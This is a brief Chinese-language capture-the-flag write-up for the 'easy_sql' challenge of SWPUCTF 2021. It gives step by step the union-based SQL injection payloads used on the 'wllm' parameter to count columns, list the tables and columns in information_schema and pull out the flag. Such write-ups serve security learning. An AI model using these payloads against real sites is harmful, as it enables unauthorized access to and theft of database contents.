[SWPUCTF 2021 新生赛]easy_sql

一道简单不过的联合注入题，水一下文章数

查看页面源码，得到参数名

尝试用GET给wllm参数传个1

?wllm=1'页面报错，存在注入点

?wllm=1'--+页面恢复正常，为字符型

?wllm=1'order by 3--+页面正常，?wllm=1'order by 4--+页面报错，有3个字段

?wllm=-1'union select 1,2,3--+得到回显点

?wllm=-1'union select 1,database(),3--+得到数据库名test_db

1

?wllm=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="test_db"--+

得到表名test_tb,users

1

?wllm=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name="test_tb"--+

得到字段名id,flag

?wllm=-1'union select 1,flag,3 from test_tb--+得到flag